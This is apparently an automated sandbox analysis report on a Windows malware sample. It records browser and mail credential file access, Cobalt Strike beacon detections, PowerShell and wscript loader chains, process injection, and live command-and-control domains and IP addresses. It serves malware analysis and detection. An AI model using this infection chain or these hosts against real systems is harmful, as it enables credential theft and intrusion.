                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\cleanmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\cleanmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts1
                    Exploitation for Client Execution
                    111
                    Scripting
                    1
                    Abuse Elevation Control Mechanism
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    4
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    LSASS Memory114
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts4
                    PowerShell
                    Logon Script (Windows)512
                    Process Injection
                    3
                    Obfuscated Files or Information
                    Security Account Manager121
                    Security Software Discovery
                    SMB/Windows Admin Shares11
                    Email Collection
                    4
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput Capture5
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets41
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562942 Sample: creamymilkburnwtithsweethea... Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 68 www.sportvas.online 2->68 70 www.pegji.online 2->70 72 5 other IPs or domains 2->72 90 Suricata IDS alerts for network traffic 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus detection for URL or domain 2->94 96 16 other signatures 2->96 14 mshta.exe 1 2->14         started        signatures3 process4 signatures5 132 Detected Cobalt Strike Beacon 14->132 134 Suspicious powershell command line found 14->134 136 PowerShell case anomaly found 14->136 17 powershell.exe 36 14->17         started        process6 dnsIp7 66 146.70.155.254, 49722, 49792, 80 TENET-1ZA United Kingdom 17->66 60 createabetterbutte...ykingstogetmesw.vBs, Unicode 17->60 dropped 62 C:\Users\user\AppData\...\uzumsuzj.cmdline, Unicode 17->62 dropped 98 Detected Cobalt Strike Beacon 17->98 100 Suspicious powershell command line found 17->100 102 Obfuscated command line found 17->102 104 Found suspicious powershell code related to unpacking or dynamic code loading 17->104 22 wscript.exe 1 17->22         started        25 powershell.exe 21 17->25         started        27 csc.exe 3 17->27         started        30 conhost.exe 17->30         started        file8 signatures9 process10 file11 114 Detected Cobalt Strike Beacon 22->114 116 Suspicious powershell command line found 22->116 118 Wscript starts Powershell (via cmd or directly) 22->118 122 3 other signatures 22->122 32 powershell.exe 7 22->32         started        120 Loading BitLocker PowerShell Module 25->120 64 C:\Users\user\AppData\Local\...\uzumsuzj.dll, PE32 27->64 dropped 35 cvtres.exe 1 27->35         started        signatures12 process13 signatures14 82 Detected Cobalt Strike Beacon 32->82 84 Suspicious powershell command line found 32->84 86 Obfuscated command line found 32->86 37 powershell.exe 15 16 32->37         started        41 conhost.exe 32->41         started        process15 dnsIp16 74 ip.3105.filemail.com 193.30.119.205, 443, 49738 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 37->74 124 Writes to foreign memory regions 37->124 126 Injects a PE file into a foreign processes 37->126 43 aspnet_compiler.exe 37->43         started        46 aspnet_compiler.exe 37->46         started        signatures17 process18 signatures19 130 Maps a DLL or memory area into another process 43->130 48 TjxlUxenxgDChq.exe 43->48 injected process20 signatures21 88 Found direct / indirect Syscall (likely to bypass EDR) 48->88 51 cleanmgr.exe 48->51         started        process22 signatures23 106 Tries to steal Mail credentials (via file / registry access) 51->106 108 Tries to harvest and steal browser information (history, passwords, etc) 51->108 110 Modifies the context of a thread in another process (thread injection) 51->110 112 3 other signatures 51->112 54 TjxlUxenxgDChq.exe 51->54 injected 58 firefox.exe 51->58         started        process24 dnsIp25 76 www.sportvas.online 184.94.215.26, 49914, 49921, 49927 VXCHNGE-NC01US United States 54->76 78 www.pegji.online 185.151.30.221, 49950, 49957, 49966 TWENTYIGB United Kingdom 54->78 80 2 other IPs or domains 54->80 128 Found direct / indirect Syscall (likely to bypass EDR) 54->128 